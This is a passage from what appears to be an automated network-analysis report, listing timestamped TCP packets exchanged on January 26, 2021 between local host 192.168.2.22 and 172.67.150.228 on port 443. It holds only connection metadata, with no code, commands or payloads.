,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:25:19.822429895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.843436956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.843513012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.852008104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.875051022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.879328966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.879359007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.879411936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.879441977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.888462067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:19.911640882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.912218094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:19.912314892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.124550104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.145728111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438649893 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438698053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438736916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438764095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438801050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438838959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438867092 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.438868999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.438899040 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.438935041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.438971996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.439160109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.439201117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.439237118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.439249039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.439281940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.439907074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.439951897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.439987898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.439987898 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.440025091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.440063953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.440694094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.440764904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.466262102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.466551065 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.466659069 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.466685057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.466782093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.494735003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.494909048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.498755932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498781919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498801947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498816967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498836040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498855114 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498876095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.498879910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498919964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.498928070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498955011 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.498955011 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.498977900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.498980045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499005079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499017000 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499028921 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499067068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499442101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499464035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499484062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499505997 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499509096 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499528885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499536037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499562025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499563932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499589920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499592066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499614954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499614954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499644041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499663115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499666929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499684095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.499694109 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.499732018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.500997066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.522934914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.522959948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.523053885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.523076057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.523103952 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.523144960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.523171902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.549694061 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.549787045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.549789906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.549807072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.549864054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.549873114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.549877882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.549916029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.549928904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.549972057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.550338984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.550358057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.550374985 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.550406933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.550436020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.551728010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.551748037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.551768064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.551798105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.551831007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.552050114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.552062035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.552083015 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.552099943 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.552136898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.552159071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.552781105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.552800894 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.552851915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.553601980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.553620100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.553663015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.553668022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.553689957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.553702116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.553755045 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.553791046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.554481030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.554498911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.554564953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.554594040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.554655075 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.555385113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.555408001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.555428028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.555440903 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.555470943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.556065083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.556083918 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.556101084 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.556130886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.556158066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.556394100 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.557460070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557478905 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557499886 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557533979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.557559967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.557696104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557718039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557737112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.557749987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.557780981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.558388948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.558413982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.558528900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.558545113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.558561087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.558588028 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.558613062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.559523106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.559539080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.559554100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.559586048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.559611082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.573417902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.573441982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.573457956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.573584080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.573662043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.573663950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.573714018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.573720932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.604078054 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.604125023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.604163885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.604263067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.604490042 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.604540110 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.604576111 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.604604006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.605962992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606005907 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606041908 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.606065989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606089115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.606134892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.606326103 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606364965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606396914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.606424093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.606426954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.606492043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.607194901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.607234955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.607263088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.607654095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610173941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610215902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610268116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610274076 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610311985 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610316992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610330105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610371113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610374928 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610414028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610454082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610476971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610496044 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610532999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610533953 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610585928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610584974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610604048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610641956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610647917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610686064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610717058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610738993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.610754967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.610788107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611036062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611083984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611116886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611141920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611159086 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611213923 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611797094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611839056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611870050 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611895084 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.611906052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.611964941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.612608910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.612652063 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.612701893 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.612704992 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.612719059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.612751961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.613403082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.613462925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.613490105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.613512039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.613519907 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.613590956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.614173889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.614217043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.614248037 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.614272118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.614295959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.614314079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.614873886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.614989996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615032911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615066051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.615087986 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615089893 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.615164995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.615734100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615772963 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615825891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.615828991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.615847111 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.615889072 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.616543055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.616585970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.616616964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.616641045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.616643906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.616720915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.617535114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.617559910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.625291109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.625333071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.625395060 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.625401020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.625406981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.625478983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627093077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627142906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627177954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627187967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627208948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627253056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627324104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627366066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627396107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627418041 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.627434969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.627477884 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.628529072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.628582954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.628621101 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.628640890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.628663063 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.628690958 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.628912926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.628952980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.628981113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.629004002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.629125118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.629165888 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.629195929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.629219055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.629235983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.629282951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.629954100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.629995108 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.630024910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.630049944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.630059004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.630115986 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.630760908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.630804062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.630837917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.630857944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.630857944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.630928040 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.631517887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.631560087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.631593943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.631613016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.631616116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.631675005 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.632320881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.632370949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.632405043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.632427931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.632432938 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.632494926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.633114100 CET	443	49165	172.67.150.228	192.168.2.22
